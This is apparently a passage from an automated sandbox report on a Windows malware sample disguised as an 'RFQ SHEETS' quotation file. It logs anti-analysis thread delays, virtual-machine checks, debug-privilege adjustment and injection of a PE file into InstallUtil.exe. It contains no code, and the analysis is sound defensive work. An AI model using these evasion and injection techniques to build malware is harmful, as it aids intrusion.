                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598011Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597356Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597029Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596916Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595935Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594951Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594514Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeWindow / User API: threadDelayed 8280Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeWindow / User API: threadDelayed 1582Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2527Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7324Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe TID: 7632Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe TID: 7632Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8164Thread sleep count: 2527 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8164Thread sleep count: 7324 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598011s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597356s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597249s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597029s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596916s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596702s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596046s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595935s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595171s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594951s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594514s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598011Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597356Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597029Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596916Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595935Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594951Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594514Jump to behavior
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1607782515GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: InstallUtil.exe, 00000005.00000002.2989899538.00000000010DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06699548 LdrInitializeThunk,LdrInitializeThunk,5_2_06699548
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A22008Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
